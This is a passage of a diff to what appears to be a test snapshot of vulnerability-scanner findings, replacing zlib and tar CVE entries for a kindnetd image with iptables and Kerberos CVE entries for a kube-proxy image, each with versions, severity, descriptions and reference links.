"https://linux.oracle.com/cve/CVE-2022-48303.html", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.7-1", + "packageName": "libip6tc2", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://savannah.gnu.org/bugs/?62387", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://savannah.gnu.org/patch/?10307", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1:1.2.11.dfsg-1+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-37434", - "installedVersion": "1:1.2.11.dfsg-1", - "packageName": "zlib1g", + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libk5crypto3", "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/37", - "http://seclists.org/fulldisclosure/2022/Oct/38", - "http://seclists.org/fulldisclosure/2022/Oct/41", - "http://seclists.org/fulldisclosure/2022/Oct/42", - "http://www.openwall.com/lists/oss-security/2022/08/05/2", - "http://www.openwall.com/lists/oss-security/2022/08/09/1", - "https://access.redhat.com/errata/RHSA-2022:8291", - "https://access.redhat.com/security/cve/CVE-2022-37434", - "https://bugzilla.redhat.com/2116639", - "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", - "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", - "https://errata.almalinux.org/9/ALSA-2022-8291.html", - "https://errata.rockylinux.org/RLSA-2022:8291", - "https://github.com/curl/curl/issues/9271", - "https://github.com/ivd38/zlib_overflow", - "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", - "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", - "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", - "https://linux.oracle.com/cve/CVE-2022-37434.html", - "https://linux.oracle.com/errata/ELSA-2023-1095.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", - "https://security.netapp.com/advisory/ntap-20220901-0005/", - "https://security.netapp.com/advisory/ntap-20230427-0007/", - "https://support.apple.com/kb/HT213488", - "https://support.apple.com/kb/HT213489", - "https://support.apple.com/kb/HT213490", - "https://support.apple.com/kb/HT213491", - "https://support.apple.com/kb/HT213493", - "https://support.apple.com/kb/HT213494", - "https://ubuntu.com/security/notices/USN-5570-1", - "https://ubuntu.com/security/notices/USN-5570-2", - "https://ubuntu.com/security/notices/USN-5573-1", - "https://www.cve.org/CVERecord?id=CVE-2022-37434", - "https://www.debian.org/security/2022/dsa-5218", + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", ], }, "category": "Vulnerability", - "description": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field", + "name": "integer overflow vulnerabilities in PAC parsing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-37434", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/37", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/38", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/42", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/08/05/2", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/08/09/1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8291", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-37434", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2116639", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8291.html", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8291", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://github.com/curl/curl/issues/9271", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://github.com/ivd38/zlib_overflow", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, { "type": "URL", - "value": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-37434.html", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-1095.html", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libk5crypto3", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", + ], + }, + "category": "Vulnerability", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220901-0005/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5-3", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", + ], + }, + "category": "Vulnerability", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "integer overflow vulnerabilities in PAC parsing", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213489", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213490", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213491", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213493", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213494", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-2", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5573-1", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-37434", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5218", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1:1.2.11.dfsg-1+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-25032", - "installedVersion": "1:1.2.11.dfsg-1", - "packageName": "zlib1g", - "references": [ - "http://seclists.org/fulldisclosure/2022/May/33", - "http://seclists.org/fulldisclosure/2022/May/35", - "http://seclists.org/fulldisclosure/2022/May/38", - "http://www.openwall.com/lists/oss-security/2022/03/25/2", - "http://www.openwall.com/lists/oss-security/2022/03/26/1", - "https://access.redhat.com/errata/RHSA-2022:8420", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", - "https://access.redhat.com/security/cve/CVE-2018-25032", - "https://bugzilla.redhat.com/2067945", - "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", - "https://errata.almalinux.org/9/ALSA-2022-8420.html", - "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", - "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", - "https://github.com/madler/zlib/issues/605", - "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", - "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", - "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", - "https://linux.oracle.com/cve/CVE-2018-25032.html", - "https://linux.oracle.com/errata/ELSA-2022-9565.html", - "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", - "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", - "https://security.gentoo.org/glsa/202210-42", - "https://security.netapp.com/advisory/ntap-20220526-0009/", - "https://security.netapp.com/advisory/ntap-20220729-0004/", - "https://support.apple.com/kb/HT213255", - "https://support.apple.com/kb/HT213256", - "https://support.apple.com/kb/HT213257", - "https://ubuntu.com/security/notices/USN-5355-1", - "https://ubuntu.com/security/notices/USN-5355-2", - "https://ubuntu.com/security/notices/USN-5359-1", - "https://ubuntu.com/security/notices/USN-5359-2", - "https://ubuntu.com/security/notices/USN-5739-1", - "https://www.cve.org/CVERecord?id=CVE-2018-25032", - "https://www.debian.org/security/2022/dsa-5111", - "https://www.openwall.com/lists/oss-security/2022/03/24/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/3", - "https://www.oracle.com/security-alerts/cpujul2022.html", - ], - }, - "category": "Vulnerability", - "description": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "A flaw found in zlib when compressing (not decompressing) certain inputs", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-25032", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/33", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/35", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/38", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/25/2", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/26/1", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8420", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-25032", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2067945", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8420.html", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", }, { "type": "URL", - "value": "https://github.com/madler/zlib/issues/605", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5-3", + "references": [ + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", + ], + }, + "category": "Vulnerability", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "references": [ { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2018-25032.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9565.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5support0", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + 